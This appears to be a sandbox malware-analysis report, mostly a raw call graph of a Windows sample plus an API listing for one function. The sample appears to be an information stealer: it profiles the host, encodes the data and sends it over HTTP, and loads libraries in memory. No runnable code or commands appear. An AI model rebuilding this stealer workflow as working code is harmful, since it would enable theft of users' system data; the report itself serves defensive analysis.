64a8a0 lstrcpy 14772->14773 14773->14768 14773->14769 14773->14771 14773->14772 14776 641077 14774->14776 14775 641151 14775->13545 14776->14775 14777 64a820 lstrlen lstrcpy 14776->14777 14777->14776 14783 640db7 14778->14783 14779 640f17 14779->13553 14780 640ea4 StrCmpCA 14780->14783 14781 640e27 StrCmpCA 14781->14783 14782 640e67 StrCmpCA 14782->14783 14783->14779 14783->14780 14783->14781 14783->14782 14784 64a820 lstrlen lstrcpy 14783->14784 14784->14783 14789 640f67 14785->14789 14786 641044 14786->13561 14787 640fb2 StrCmpCA 14787->14789 14788 64a820 lstrlen lstrcpy 14788->14789 14789->14786 14789->14787 14789->14788 14791 64a740 lstrcpy 14790->14791 14792 641a26 14791->14792 14793 64a9b0 4 API calls 14792->14793 14794 641a37 14793->14794 14795 64a8a0 lstrcpy 14794->14795 14796 641a40 14795->14796 14797 64a9b0 4 API calls 14796->14797 14798 641a5b 14797->14798 14799 64a8a0 lstrcpy 14798->14799 14800 641a64 14799->14800 14801 64a9b0 4 API calls 14800->14801 14802 641a7d 14801->14802 14803 64a8a0 lstrcpy 14802->14803 14804 641a86 14803->14804 14805 64a9b0 4 API calls 14804->14805 14806 641aa1 14805->14806 14807 64a8a0 lstrcpy 14806->14807 14808 641aaa 14807->14808 14809 64a9b0 4 API calls 14808->14809 14810 641ac3 14809->14810 14811 64a8a0 lstrcpy 14810->14811 14812 641acc 14811->14812 14813 64a9b0 4 API calls 14812->14813 14814 641ae7 14813->14814 14815 64a8a0 lstrcpy 14814->14815 14816 641af0 14815->14816 14817 64a9b0 4 API calls 14816->14817 14818 641b09 14817->14818 14819 64a8a0 lstrcpy 14818->14819 14820 641b12 14819->14820 14821 64a9b0 4 API calls 14820->14821 14822 641b2d 14821->14822 14823 64a8a0 lstrcpy 14822->14823 14824 641b36 14823->14824 14825 64a9b0 4 API calls 14824->14825 14826 641b4f 14825->14826 14827 64a8a0 lstrcpy 14826->14827 14828 641b58 14827->14828 14829 64a9b0 4 API calls 14828->14829 14830 641b76 14829->14830 14831 64a8a0 lstrcpy 14830->14831 14832 641b7f 14831->14832 14833 647500 6 API calls 14832->14833 14834 641b96 14833->14834 14835 64a920 3 API calls 14834->14835 14836 641ba9 14835->14836 14837 64a8a0 lstrcpy 14836->14837 14838 641bb2 14837->14838 14839 64a9b0 4 API calls 14838->14839 14840 641bdc 14839->14840 14841 64a8a0 lstrcpy 14840->14841 14842 641be5 14841->14842 14843 64a9b0 4 API calls 14842->14843 14844 641c05 14843->14844 14845 64a8a0 lstrcpy 14844->14845 14846 641c0e 14845->14846 15552 647690 GetProcessHeap RtlAllocateHeap 14846->15552 14849 64a9b0 4 API calls 14850 641c2e 14849->14850 14851 64a8a0 lstrcpy 14850->14851 14852 641c37 14851->14852 14853 64a9b0 4 API calls 14852->14853 14854 641c56 14853->14854 14855 64a8a0 lstrcpy 14854->14855 14856 641c5f 14855->14856 14857 64a9b0 4 API calls 14856->14857 14858 641c80 14857->14858 14859 64a8a0 lstrcpy 14858->14859 14860 641c89 14859->14860 15559 6477c0 GetCurrentProcess IsWow64Process 14860->15559 14863 64a9b0 4 API calls 14864 641ca9 14863->14864 14865 64a8a0 lstrcpy 14864->14865 14866 641cb2 14865->14866 14867 64a9b0 4 API calls 14866->14867 14868 641cd1 14867->14868 14869 64a8a0 lstrcpy 14868->14869 14870 641cda 14869->14870 14871 64a9b0 4 API calls 14870->14871 14872 641cfb 14871->14872 14873 64a8a0 lstrcpy 14872->14873 14874 641d04 14873->14874 14875 647850 3 API calls 14874->14875 14876 641d14 14875->14876 14877 64a9b0 4 API calls 14876->14877 14878 641d24 14877->14878 14879 64a8a0 lstrcpy 14878->14879 14880 641d2d 14879->14880 14881 64a9b0 4 API calls 14880->14881 14882 641d4c 14881->14882 14883 64a8a0 lstrcpy 14882->14883 14884 641d55 14883->14884 14885 64a9b0 4 API calls 14884->14885 14886 641d75 14885->14886 14887 64a8a0 lstrcpy 14886->14887 14888 641d7e 14887->14888 14889 6478e0 3 API calls 14888->14889 14890 641d8e 14889->14890 14891 64a9b0 4 API calls 14890->14891 14892 641d9e 14891->14892 14893 64a8a0 lstrcpy 14892->14893 14894 641da7 14893->14894 14895 64a9b0 4 API calls 14894->14895 14896 641dc6 14895->14896 14897 64a8a0 lstrcpy 14896->14897 14898 641dcf 14897->14898 14899 64a9b0 4 API calls 14898->14899 14900 641df0 14899->14900 14901 64a8a0 lstrcpy 14900->14901 14902 641df9 14901->14902 15561 647980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14902->15561 14905 64a9b0 4 API calls 14906 641e19 14905->14906 14907 64a8a0 lstrcpy 14906->14907 14908 641e22 14907->14908 14909 64a9b0 4 API calls 14908->14909 14910 641e41 14909->14910 14911 64a8a0 lstrcpy 14910->14911 14912 641e4a 14911->14912 14913 64a9b0 4 API calls 14912->14913 14914 641e6b 14913->14914 14915 64a8a0 lstrcpy 14914->14915 14916 641e74 14915->14916 15563 647a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14916->15563 14919 64a9b0 4 API calls 14920 641e94 14919->14920 14921 64a8a0 lstrcpy 14920->14921 14922 641e9d 14921->14922 14923 64a9b0 4 API calls 14922->14923 14924 641ebc 14923->14924 14925 64a8a0 lstrcpy 14924->14925 14926 641ec5 14925->14926 14927 64a9b0 4 API calls 14926->14927 14928 641ee5 14927->14928 14929 64a8a0 lstrcpy 14928->14929 14930 641eee 14929->14930 15566 647b00 GetUserDefaultLocaleName 14930->15566 14933 64a9b0 4 API calls 14934 641f0e 14933->14934 14935 64a8a0 lstrcpy 14934->14935 14936 641f17 14935->14936 14937 64a9b0 4 API calls 14936->14937 14938 641f36 14937->14938 14939 64a8a0 lstrcpy 14938->14939 14940 641f3f 14939->14940 14941 64a9b0 4 API calls 14940->14941 14942 641f60 14941->14942 14943 64a8a0 lstrcpy 14942->14943 14944 641f69 14943->14944 15570 647b90 14944->15570 14946 641f80 14947 64a920 3 API calls 14946->14947 14948 641f93 14947->14948 14949 64a8a0 lstrcpy 14948->14949 14950 641f9c 14949->14950 14951 64a9b0 4 API calls 14950->14951 14952 641fc6 14951->14952 14953 64a8a0 lstrcpy 14952->14953 14954 641fcf 14953->14954 14955 64a9b0 4 API calls 14954->14955 14956 641fef 14955->14956 14957 64a8a0 lstrcpy 14956->14957 14958 641ff8 14957->14958 15582 647d80 GetSystemPowerStatus 14958->15582 14961 64a9b0 4 API calls 14962 642018 14961->14962 14963 64a8a0 lstrcpy 14962->14963 14964 642021 14963->14964 14965 64a9b0 4 API calls 14964->14965 14966 642040 14965->14966 14967 64a8a0 lstrcpy 14966->14967 14968 642049 14967->14968 14969 64a9b0 4 API calls 14968->14969 14970 64206a 14969->14970 14971 64a8a0 lstrcpy 14970->14971 14972 642073 14971->14972 14973 64207e GetCurrentProcessId 14972->14973 15584 649470 OpenProcess 14973->15584 14976 64a920 3 API calls 14977 6420a4 14976->14977 14978 64a8a0 lstrcpy 14977->14978 14979 6420ad 14978->14979 14980 64a9b0 4 API calls 14979->14980 14981 6420d7 14980->14981 14982 64a8a0 lstrcpy 14981->14982 14983 6420e0 14982->14983 14984 64a9b0 4 API calls 14983->14984 14985 642100 14984->14985 14986 64a8a0 lstrcpy 14985->14986 14987 642109 14986->14987 15589 647e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14987->15589 14990 64a9b0 4 API calls 14991 642129 14990->14991 14992 64a8a0 lstrcpy 14991->14992 14993 642132 14992->14993 14994 64a9b0 4 API calls 14993->14994 14995 642151 14994->14995 14996 64a8a0 lstrcpy 14995->14996 14997 64215a 14996->14997 14998 64a9b0 4 API calls 14997->14998 14999 64217b 14998->14999 15000 64a8a0 lstrcpy 14999->15000 15001 642184 15000->15001 15593 647f60 15001->15593 15004 64a9b0 4 API calls 15005 6421a4 15004->15005 15006 64a8a0 lstrcpy 15005->15006 15007 6421ad 15006->15007 15008 64a9b0 4 API calls 15007->15008 15009 6421cc 15008->15009 15010 64a8a0 lstrcpy 15009->15010 15011 6421d5 15010->15011 15012 64a9b0 4 API calls 15011->15012 15013 6421f6 15012->15013 15014 64a8a0 lstrcpy 15013->15014 15015 6421ff 15014->15015 15606 647ed0 GetSystemInfo wsprintfA 15015->15606 15018 64a9b0 4 API calls 15019 64221f 15018->15019 15020 64a8a0 lstrcpy 15019->15020 15021 642228 15020->15021 15022 64a9b0 4 API calls 15021->15022 15023 642247 15022->15023 15024 64a8a0 lstrcpy 15023->15024 15025 642250 15024->15025 15026 64a9b0 4 API calls 15025->15026 15027 642270 15026->15027 15028 64a8a0 lstrcpy 15027->15028 15029 642279 15028->15029 15608 648100 GetProcessHeap RtlAllocateHeap 15029->15608 15032 64a9b0 4 API calls 15033 642299 15032->15033 15034 64a8a0 lstrcpy 15033->15034 15035 6422a2 15034->15035 15036 64a9b0 4 API calls 15035->15036 15037 6422c1 15036->15037 15038 64a8a0 lstrcpy 15037->15038 15039 6422ca 15038->15039 15040 64a9b0 4 API calls 15039->15040 15041 6422eb 15040->15041 15042 64a8a0 lstrcpy 15041->15042 15043 6422f4 15042->15043 15614 6487c0 15043->15614 15046 64a920 3 API calls 15047 64231e 15046->15047 15048 64a8a0 lstrcpy 15047->15048 15049 642327 15048->15049 15050 64a9b0 4 API calls 15049->15050 15051 642351 15050->15051 15052 64a8a0 lstrcpy 15051->15052 15053 64235a 15052->15053 15054 64a9b0 4 API calls 15053->15054 15055 64237a 15054->15055 15056 64a8a0 lstrcpy 15055->15056 15057 642383 15056->15057 15058 64a9b0 4 API calls 15057->15058 15059 6423a2 15058->15059 15060 64a8a0 lstrcpy 15059->15060 15061 6423ab 15060->15061 15619 6481f0 15061->15619 15063 6423c2 15064 64a920 3 API calls 15063->15064 15065 6423d5 15064->15065 15066 64a8a0 lstrcpy 15065->15066 15067 6423de 15066->15067 15068 64a9b0 4 API calls 15067->15068 15069 64240a 15068->15069 15070 64a8a0 lstrcpy 15069->15070 15071 642413 15070->15071 15072 64a9b0 4 API calls 15071->15072 15073 642432 15072->15073 15074 64a8a0 lstrcpy 15073->15074 15075 64243b 15074->15075 15076 64a9b0 4 API calls 15075->15076 15077 64245c 15076->15077 15078 64a8a0 lstrcpy 15077->15078 15079 642465 15078->15079 15080 64a9b0 4 API calls 15079->15080 15081 642484 15080->15081 15082 64a8a0 lstrcpy 15081->15082 15083 64248d 15082->15083 15084 64a9b0 4 API calls 15083->15084 15085 6424ae 15084->15085 15086 64a8a0 lstrcpy 15085->15086 15087 6424b7 15086->15087 15627 648320 15087->15627 15089 6424d3 15090 64a920 3 API calls 15089->15090 15091 6424e6 15090->15091 15092 64a8a0 lstrcpy 15091->15092 15093 6424ef 15092->15093 15094 64a9b0 4 API calls 15093->15094 15095 642519 15094->15095 15096 64a8a0 lstrcpy 15095->15096 15097 642522 15096->15097 15098 64a9b0 4 API calls 15097->15098 15099 642543 15098->15099 15100 64a8a0 lstrcpy 15099->15100 15101 64254c 15100->15101 15102 648320 17 API calls 15101->15102 15103 642568 15102->15103 15104 64a920 3 API calls 15103->15104 15105 64257b 15104->15105 15106 64a8a0 lstrcpy 15105->15106 15107 642584 15106->15107 15108 64a9b0 4 API calls 15107->15108 15109 6425ae 15108->15109 15110 64a8a0 lstrcpy 15109->15110 15111 6425b7 15110->15111 15112 64a9b0 4 API calls 15111->15112 15113 6425d6 15112->15113 15114 64a8a0 lstrcpy 15113->15114 15115 6425df 15114->15115 15116 64a9b0 4 API calls 15115->15116 15117 642600 15116->15117 15118 64a8a0 lstrcpy 15117->15118 15119 642609 15118->15119 15663 648680 15119->15663 15121 642620 15122 64a920 3 API calls 15121->15122 15123 642633 15122->15123 15124 64a8a0 lstrcpy 15123->15124 15125 64263c 15124->15125 15126 64265a lstrlen 15125->15126 15127 64266a 15126->15127 15128 64a740 lstrcpy 15127->15128 15129 64267c 15128->15129 15130 631590 lstrcpy 15129->15130 15131 64268d 15130->15131 15673 645190 15131->15673 15133 642699 15133->13565 15861 64aad0 15134->15861 15136 635009 InternetOpenUrlA 15139 635021 15136->15139 15137 6350a0 InternetCloseHandle InternetCloseHandle 15140 6350ec 15137->15140 15138 63502a InternetReadFile 15138->15139 15139->15137 15139->15138 15140->13569 15862 6398d0 15141->15862 15143 640759 15144 64077d 15143->15144 15145 640a38 15143->15145 15147 640799 StrCmpCA 15144->15147 15146 631590 lstrcpy 15145->15146 15148 640a49 15146->15148 15149 6407a8 15147->15149 15176 640843 15147->15176 16038 640250 15148->16038 15152 64a7a0 lstrcpy 15149->15152 15154 6407c3 15152->15154 15153 640865 StrCmpCA 15155 640874 15153->15155 15193 64096b 15153->15193 15156 631590 lstrcpy 15154->15156 15157 64a740 lstrcpy 15155->15157 15158 64080c 15156->15158 15160 640881 15157->15160 15161 64a7a0 lstrcpy 15158->15161 15159 64099c StrCmpCA 15162 6409ab 15159->15162 15182 640a2d 15159->15182 15163 64a9b0 4 API calls 15160->15163 15164 640823 15161->15164 15165 631590 lstrcpy 15162->15165 15166 6408ac 15163->15166 15167 64a7a0 lstrcpy 15164->15167 15168 6409f4 15165->15168 15169 64a920 3 API calls 15166->15169 15170 64083e 15167->15170 15171 64a7a0 lstrcpy 15168->15171 15172 6408b3 15169->15172 15865 63fb00 15170->15865 15174 640a0d 15171->15174 15175 64a9b0 4 API calls 15172->15175 15177 64a7a0 lstrcpy 15174->15177 15178 6408ba 15175->15178 15176->15153 15179 640a28 15177->15179 15180 64a8a0 lstrcpy 15178->15180 15981 640030 15179->15981 15182->13573 15193->15159 15513 64a7a0 lstrcpy 15512->15513 15514 631683 15513->15514 15515 64a7a0 lstrcpy 15514->15515 15516 631695 15515->15516 15517 64a7a0 lstrcpy 15516->15517 15518 6316a7 15517->15518 15519 64a7a0 lstrcpy 15518->15519 15520 6315a3 15519->15520 15520->14396 15522 6347c6 15521->15522 15523 634838 lstrlen 15522->15523 15547 64aad0 15523->15547 15525 634848 InternetCrackUrlA 15526 634867 15525->15526 15526->14473 15528 64a740 lstrcpy 15527->15528 15529 648b74 15528->15529 15530 64a740 lstrcpy 15529->15530 15531 648b82 GetSystemTime 15530->15531 15534 648b99 15531->15534 15532 64a7a0 lstrcpy 15533 648bfc 15532->15533 15533->14488 15534->15532 15536 64a931 15535->15536 15537 64a988 15536->15537 15540 64a968 lstrcpy lstrcat 15536->15540 15538 64a7a0 lstrcpy 15537->15538 15539 64a994 15538->15539 15539->14491 15540->15537 15541->14606 15543 634eee 15542->15543 15544 639af9 LocalAlloc 15542->15544 15543->14494 15543->14496 15544->15543 15545 639b14 CryptStringToBinaryA 15544->15545 15545->15543 15546 639b39 LocalFree 15545->15546 15546->15543 15547->15525 15548->14616 15549->14757 15550->14759 15551->14767 15680 6477a0 15552->15680 15555 6476c6 RegOpenKeyExA 15557 647704 RegCloseKey 15555->15557 15558 6476e7 RegQueryValueExA 15555->15558 15556 641c1e 15556->14849 15557->15556 15558->15557 15560 641c99 15559->15560 15560->14863 15562 641e09 15561->15562 15562->14905 15564 641e84 15563->15564 15565 647a9a wsprintfA 15563->15565 15564->14919 15565->15564 15567 641efe 15566->15567 15568 647b4d 15566->15568 15567->14933 15687 648d20 LocalAlloc CharToOemW 15568->15687 15571 64a740 lstrcpy 15570->15571 15572 647bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15571->15572 15579 647c25 15572->15579 15573 647c46 GetLocaleInfoA 15573->15579 15574 647d18 15575 647d1e LocalFree 15574->15575 15576 647d28 15574->15576 15575->15576 15578 64a7a0 lstrcpy 15576->15578 15577 64a9b0 lstrcpy lstrlen lstrcpy lstrcat 15577->15579 15581 647d37 15578->15581 15579->15573 15579->15574 15579->15577 15580 64a8a0 lstrcpy 15579->15580 15580->15579 15581->14946 15583 642008 15582->15583 15583->14961 15585 6494b5 15584->15585 15586 649493 GetModuleFileNameExA CloseHandle 15584->15586 15587 64a740 lstrcpy 15585->15587 15586->15585 15588 642091 15587->15588 15588->14976 15590 642119 15589->15590 15591 647e68 RegQueryValueExA 15589->15591 15590->14990 15592 647e8e RegCloseKey 15591->15592 15592->15590 15594 647fb9 GetLogicalProcessorInformationEx 15593->15594 15595 647fd8 GetLastError 15594->15595 15598 648029 15594->15598 15596 648022 15595->15596 15605 647fe3 15595->15605 15597 642194 15596->15597 15601 6489f0 2 API calls 15596->15601 15597->15004 15602 6489f0 2 API calls 15598->15602 15601->15597 15603 64807b 15602->15603 15603->15596 15604 648084 wsprintfA 15603->15604 15604->15597 15605->15594 15605->15597 15688 6489f0 15605->15688 15691 648a10 GetProcessHeap RtlAllocateHeap 15605->15691 15607 64220f 15606->15607 15607->15018 15609 6489b0 15608->15609 15610 64814d GlobalMemoryStatusEx 15609->15610 15613 648163 15610->15613 15611 64819b wsprintfA 15612 642289 15611->15612 15612->15032 15613->15611 15615 6487fb GetProcessHeap RtlAllocateHeap wsprintfA 15614->15615 15617 64a740 lstrcpy 15615->15617 15618 64230b 15617->15618 15618->15046 15620 64a740 lstrcpy 15619->15620 15624 648229 15620->15624 15621 648263 15623 64a7a0 lstrcpy 15621->15623 15622 64a9b0 lstrcpy lstrlen lstrcpy lstrcat 15622->15624 15625 6482dc 15623->15625 15624->15621 15624->15622 15626 64a8a0 lstrcpy 15624->15626 15625->15063 15626->15624 15628 64a740 lstrcpy 15627->15628 15629 64835c RegOpenKeyExA 15628->15629 15630 6483d0 15629->15630 15631 6483ae 15629->15631 15633 648613 RegCloseKey 15630->15633 15634 6483f8 RegEnumKeyExA 15630->15634 15632 64a7a0 lstrcpy 15631->15632 15644 6483bd 15632->15644 15637 64a7a0 lstrcpy 15633->15637 15635 64860e 15634->15635 15636 64843f wsprintfA RegOpenKeyExA 15634->15636 15635->15633 15638 648485 RegCloseKey RegCloseKey 15636->15638 15639 6484c1 RegQueryValueExA 15636->15639 15637->15644 15640 64a7a0 lstrcpy 15638->15640 15641 648601 RegCloseKey 15639->15641 15642 6484fa lstrlen 15639->15642 15640->15644 15641->15635 15642->15641 15643 648510 15642->15643 15645 64a9b0 4 API calls 15643->15645 15644->15089 15646 648527 15645->15646 15647 64a8a0 lstrcpy 15646->15647 15648 648533 15647->15648 15649 64a9b0 4 API calls 15648->15649 15650 648557 15649->15650 15651 64a8a0 lstrcpy 15650->15651 15652 648563 15651->15652 15653 64856e RegQueryValueExA 15652->15653 15653->15641 15654 6485a3 15653->15654 15655 64a9b0 4 API calls 15654->15655 15656 6485ba 15655->15656 15657 64a8a0 lstrcpy 15656->15657 15658 6485c6 15657->15658 15659 64a9b0 4 API calls 15658->15659 15660 6485ea 15659->15660 15661 64a8a0 lstrcpy 15660->15661 15662 6485f6 15661->15662 15662->15641 15664 64a740 lstrcpy 15663->15664 15665 6486bc CreateToolhelp32Snapshot Process32First 15664->15665 15666 64875d CloseHandle 15665->15666 15667 6486e8 Process32Next 15665->15667 15668 64a7a0 lstrcpy 15666->15668 15667->15666 15672 6486fd 15667->15672 15671 648776 15668->15671 15669 64a9b0 lstrcpy lstrlen lstrcpy lstrcat 15669->15672 15670 64a8a0 lstrcpy 15670->15672 15671->15121 15672->15667 15672->15669 15672->15670 15674 64a7a0 lstrcpy 15673->15674 15675 6451b5 15674->15675 15676 631590 lstrcpy 15675->15676 15677 6451c6 15676->15677 15692 635100 15677->15692 15679 6451cf 15679->15133 15683 647720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15680->15683 15682 6476b9 15682->15555 15682->15556 15684 647765 RegQueryValueExA 15683->15684 15685 647780 RegCloseKey 15683->15685 15684->15685 15686 647793 15685->15686 15686->15682 15687->15567 15689 648a0c 15688->15689 15690 6489f9 GetProcessHeap HeapFree 15688->15690 15689->15605 15690->15689 15691->15605 15693 64a7a0 lstrcpy 15692->15693 15694 635119 15693->15694 15695 6347b0 2 API calls 15694->15695 15696 635125 15695->15696 15852 648ea0 15696->15852 15698 635184 15699 635192 lstrlen 15698->15699 15700 6351a5 15699->15700 15701 648ea0 4 API calls 15700->15701 15702 6351b6 15701->15702 15703 64a740 lstrcpy 15702->15703 15704 6351c9 15703->15704 15705 64a740 lstrcpy 15704->15705 15706 6351d6 15705->15706 15707 64a740 lstrcpy 15706->15707 15708 6351e3 15707->15708 15709 64a740 lstrcpy 15708->15709 15710 6351f0 15709->15710 15711 64a740 lstrcpy 15710->15711 15712 6351fd InternetOpenA StrCmpCA 15711->15712 15713 63522f 15712->15713 15714 6358c4 InternetCloseHandle 15713->15714 15715 648b60 3 API calls 15713->15715 15721 6358d9 ctype 15714->15721 15716 63524e 15715->15716 15717 64a920 3 API calls 15716->15717 15718 635261 15717->15718 15719 64a8a0 lstrcpy 15718->15719 15720 63526a 15719->15720 15722 64a9b0 4 API calls 15720->15722 15725 64a7a0 lstrcpy 15721->15725 15723 6352ab 15722->15723 15724 64a920 3 API calls 15723->15724 15726 6352b2 15724->15726 15733 635913 15725->15733 15727 64a9b0 4 API calls 15726->15727 15728 6352b9 15727->15728 15729 64a8a0 lstrcpy 15728->15729 15730 6352c2 15729->15730 15731 64a9b0 4 API calls 15730->15731 15732 635303 15731->15732 15734 64a920 3 API calls 15732->15734 15733->15679 15735 63530a 15734->15735 15736 64a8a0 lstrcpy 15735->15736 15737 635313 15736->15737 15738 635329 InternetConnectA 15737->15738 15738->15714 15739 635359 HttpOpenRequestA 15738->15739 15741 6358b7 InternetCloseHandle 15739->15741 15742 6353b7 15739->15742 15741->15714 15743 64a9b0 4 API calls 15742->15743 15744 6353cb 15743->15744 15745 64a8a0 lstrcpy 15744->15745 15746 6353d4 15745->15746 15747 64a920 3 API calls 15746->15747 15748 6353f2 15747->15748 15749 64a8a0 lstrcpy 15748->15749 15750 6353fb 15749->15750 15751 64a9b0 4 API calls 15750->15751 15752 63541a 15751->15752 15753 64a8a0 lstrcpy 15752->15753 15754 635423 15753->15754 15755 64a9b0 4 API calls 15754->15755 15756 635444 15755->15756 15757 64a8a0 lstrcpy 15756->15757 15758 63544d 15757->15758 15759 64a9b0 4 API calls 15758->15759 15760 63546e 15759->15760 15761 64a8a0 lstrcpy 15760->15761 15853 648ead CryptBinaryToStringA 15852->15853 15857 648ea9 15852->15857 15854 648ece GetProcessHeap RtlAllocateHeap 15853->15854 15853->15857 15855 648ef4 ctype 15854->15855 15854->15857 15856 648f05 CryptBinaryToStringA 15855->15856 15856->15857 15857->15698 15861->15136 16104 639880 15862->16104 15864 6398e1 15864->15143 15866 64a740 lstrcpy 15865->15866 15867 63fb16 15866->15867 16039 64a740 lstrcpy 16038->16039 16040 640266 16039->16040 16041 648de0 2 API calls 16040->16041 16042 64027b 16041->16042 16043 64a920 3 API calls 16042->16043 16044 64028b 16043->16044 16045 64a8a0 lstrcpy 16044->16045 16046 640294 16045->16046 16047 64a9b0 4 API calls 16046->16047 16048 6402b8 16047->16048 16049 64a8a0 lstrcpy 16048->16049 16105 63988d 16104->16105 16108 636fb0 16105->16108 16107 6398ad ctype 16107->15864 16111 636d40 16108->16111 16112 636d63 16111->16112 16123 636d59 16111->16123 16112->16123 16125 636660 16112->16125 16114 636dbe 16114->16123 16131 6369b0 16114->16131 16116 636e2a 16117 636ee6 VirtualFree 16116->16117 16119 636ef7 16116->16119 16116->16123 16117->16119 16118 636f41 16120 6489f0 2 API calls 16118->16120 16118->16123 16119->16118 16121 636f26 FreeLibrary 16119->16121 16122 636f38 16119->16122 16120->16123 16121->16119 16124 6489f0 2 API calls 16122->16124 16123->16107 16124->16118 16126 63668f VirtualAlloc 16125->16126 16128 636730 16126->16128 16130 63673c 16126->16130 16129 636743 VirtualAlloc 16128->16129 16128->16130 16129->16130 16130->16114 16132 6369c9 16131->16132 16136 6369d5 16131->16136 16133 636a09 LoadLibraryA 16132->16133 16132->16136 16134 636a32 16133->16134 16133->16136 16138 636ae0 16134->16138 16141 648a10 GetProcessHeap RtlAllocateHeap 16134->16141 16136->16116 16137 636ba8 GetProcAddress 16137->16136 16137->16138 16138->16136 16138->16137 16139 6489f0 2 API calls 16139->16138 16140 636a8b 16140->16136 16140->16139 16141->16140

                    Executed Functions

                    Function 00649860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 660 649860-649874 call 649750 663 649a93-649af2 LoadLibraryA * 5 660->663 664 64987a-649a8e call 649780 GetProcAddress * 21 660->664 666 649af4-649b08 GetProcAddress 663->666 667 649b0d-649b14 663->667 664->663 666->667 669 649b46-649b4d 667->669 670 649b16-649b41 GetProcAddress * 2 667->670 671 649b4f-649b63 GetProcAddress 669->671 672 649b68-649b6f 669->672 670->669 671->672 673 649b71-649b84 GetProcAddress 672->673 674 649b89-649b90 672->674 673->674 675 649bc1-649bc2 674->675 676 649b92-649bbc GetProcAddress * 2 674->676 676->675
                    APIs
                    • GetProcAddress.KERNEL32(74DD0000,01443018), ref: 006498A1
                    • GetProcAddress.KERNEL32(74DD0000,01443210), ref: 006498BA
                    • GetProcAddress.KERNEL32(74DD0000,01443138), ref: 006498D2
                    • GetProcAddress.KERNEL32(74DD0000,01443180), ref: 006498EA
                    • GetProcAddress.KERNEL32(74DD0000,01443270), ref: 00649903
                    • GetProcAddress.KERNEL32(74DD0000,01449F18), ref: 0064991B
                    • GetProcAddress.KERNEL32(74DD0000,01435870), ref: 00649933
                    • GetProcAddress.KERNEL32(74DD0000,01435810), ref: 0064994C
                    • GetProcAddress.KERNEL32(74DD0000,01443240), ref: 00649964
                    • GetProcAddress.KERNEL32(74DD0000,01443078), ref: 0064997C
                    • GetProcAddress.KERNEL32(74DD0000,014431F8), ref: 00649995
                    • GetProcAddress.KERNEL32(74DD0000,01443288), ref: 006499AD
                    • GetProcAddress.KERNEL32(74DD0000,014358F0), ref: 006499C5
                    • GetProcAddress.KERNEL32(74DD0000,01443258), ref: 006499DE
                    • GetProcAddress.KERNEL32(74DD0000,01443198), ref: 006499F6
                    • GetProcAddress.KERNEL32(74DD0000,01435890), ref: 00649A0E
                    • GetProcAddress.KERNEL32(74DD0000,014432A0), ref: 00649A27
                    • GetProcAddress.KERNEL32(74DD0000,01443030), ref: 00649A3F
                    • GetProcAddress.KERNEL32(74DD0000,01435850), ref: 00649A57
                    • GetProcAddress.KERNEL32(74DD0000,01442FE8), ref: 00649A70
                    • GetProcAddress.KERNEL32(74DD0000,01435730), ref: 00649A88
                    • LoadLibraryA.KERNEL32(014430C0,?,00646A00), ref: 00649A9A
                    • LoadLibraryA.KERNEL32(01443060,?,00646A00), ref: 00649AAB
                    • LoadLibraryA.KERNEL32(014430D8,?,00646A00), ref: 00649ABD
                    • LoadLibraryA.KERNEL32(01443090,?,00646A00), ref: 00649ACF
                    • LoadLibraryA.KERNEL32(014431C8,?,00646A00), ref: 00649AE0
                    • GetProcAddress.KERNEL32(75A70000,01443108), ref: 00649B02
                    • GetProcAddress.KERNEL32(75290000,01443150), ref: 00649B23
                    • GetProcAddress.KERNEL32(75290000,014431B0), ref: 00649B3B
                    • GetProcAddress.KERNEL32(75BD0000,01443228), ref: 00649B5D
                    • GetProcAddress.KERNEL32(75450000,014356F0), ref: 00649B7E
                    • GetProcAddress.KERNEL32(76E90000,01449F08), ref: 00649B9F
                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00649BB6
                    Strings
                    • NtQueryInformationProcess, xrefs: 00649BAA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: NtQueryInformationProcess
                    • API String ID: 2238633743-2781105232
                    • Opcode ID: 2c23c61fc6acc747dc8c45642a279fd177d22a83eb188ad24829d101bd85b7be
                    • Instruction ID: f96f7633abefbb04c5a01fd70d58a0d7d0ad93b319306f6a3c5f77c4ec750d29
                    • Opcode Fuzzy Hash: 2c23c61fc6acc747dc8c45642a279fd177d22a83eb188ad24829d101bd85b7be
                    • Instruction Fuzzy Hash: 3CA136B55142049FD34CEFA8ED8DA6A3BF9F7C8345704452AA65D8227CD639D8C2CB23
